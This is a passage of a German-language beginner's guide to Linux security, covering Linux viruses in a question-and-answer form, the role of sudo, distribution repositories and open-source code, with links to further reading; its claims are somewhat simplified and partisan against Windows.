  7. extremster Schutz, fĂŒr höchste AnsprĂŒche gibt es TAILS
  8. M$ Windows helfen, installieren Sie clamtk, damit Sie anderer Leute ihre Festplatten, USB-Sticks und Speicherkarten mit Windows-Ordnern auf Viren prĂŒfen

Linux – Viren

So, jetzt geht es an das Eingemachte.

Frage: Stimmt es, dass es fĂŒr Linux keine Viren gibt?
Antwort: Doch, gibt es!

Frage: Also ist Linux doch unsicher?
Antwort: Wegen den Viren, nein, aber wegen falscher Bedienung in Linux ja.

Frage: Wie nun?
Antwort: Also die Malware, das sind Viren, WĂŒrmer und Trojaner sind mehr zoologischer Art. Das heißt in freier Wildbahn, im Internet, sind diese nicht zu finden.


Die Bedrohung liegt woanders und damit zu dem konzeptionellen Aufbau von Linux.

sudo

In Linux ist es ĂŒblich, das jeder Benutzer ein eigenes, nicht-administratives Konto mit einem eigenen, verschließbarem home-Verzeichnis besitzt.
root ist der Administrator, mit dem meisten Rechten und einem eigenem home-Verzeichnis.
Eine administrative Arbeitsweise ist fĂŒr den Benutzer ausgeschlossen!
Aber um dennoch administrative Rechte zu erhalten, zum Beispiel um Software zu installieren, wird sudo mit dem Benutzer-Passwort genutzt. sudo, SuperUserDo, ist aber kein root! Bitte su nicht nutzen.
Es gibt Linux-Distributionen die root kein Passwort geben und damit auch keinen root-Zugang zum Betriebssystem. Fertig aus.

Zusammenfassung: Der Benutzer kann nicht ohne weiteres administrative Aufgaben ĂŒbernehmen. Bei bewusster Passworteingabe mit sudo, ĂŒbernimmt er die volle Verantwortung fĂŒr das laufende Betriebssystem!

Repositorien

Weiter kann der Benutzer mit sudo jede beliebige Software aus den bereitgestellten Repositorien installieren. Repositorien sind verwaltete Softwarequellen des Distributors mit meist mehr als 30.000 Programmen. Das heißt, jede Software kommt aus einer vertrauenswĂŒrdigen Quelle, im Gegensatz zum installieren von Software von irgendeiner Webseite.

Zusammenfassung: Software kann ĂŒber eine Schnittstelle vom eigenem Distributor installiert werden. Ach so, natĂŒrlich auch kostenlos.

OpenSourceSoftware

Und jetzt der Hauptgrund der Sicherheit von Linux. Offener Quellcode kann jederzeit und von jedem Menschen gelesen werden und VERBESSERT werden. Bei proprietĂ€ren Code können immer wieder Schwachstellen gefunden werden, da nur eine sehr geringe Anzahl von Entwicklern eine Übersicht besitzen. Bei offenen Quellcode wird jederzeit, von jedem Ort aus, mit einer riesigen enthusiastischen Entwicklergemeinde optimiert. Das heißt, Sie dĂŒrfen sich lieber tĂ€glich auf Updates freuen, als auf Software-SchĂ€dlinge die ein Antiviren-Programm nicht erkennt. Das Schließen von SicherheitslĂŒcken ist unter Linux schneller, als das ein Virus eine Chance bekĂ€me.

Zusammenfassung: Wenn erforderlich, tĂ€gliche Updates, als im Gegensatz zu M$ das Hinauszögern bis zu „Patch-Day“ und um es dann noch schlimmer zu machen.


weitere Informationsquellen
https://help.ubuntu.com/community/Linuxvirus#Viruses
https://de.wikipedia.org/wiki/Liste_von_Linux-Malware
https://de.wikipedia.org/wiki/Sudo
https://de.wikipedia.org/wiki/Repository


Alles was hier ĂŒber Sicherheit geschrieben steht, kann auch bewusst umgangen werden, aber eben nur mit Wissen und Verantwortung!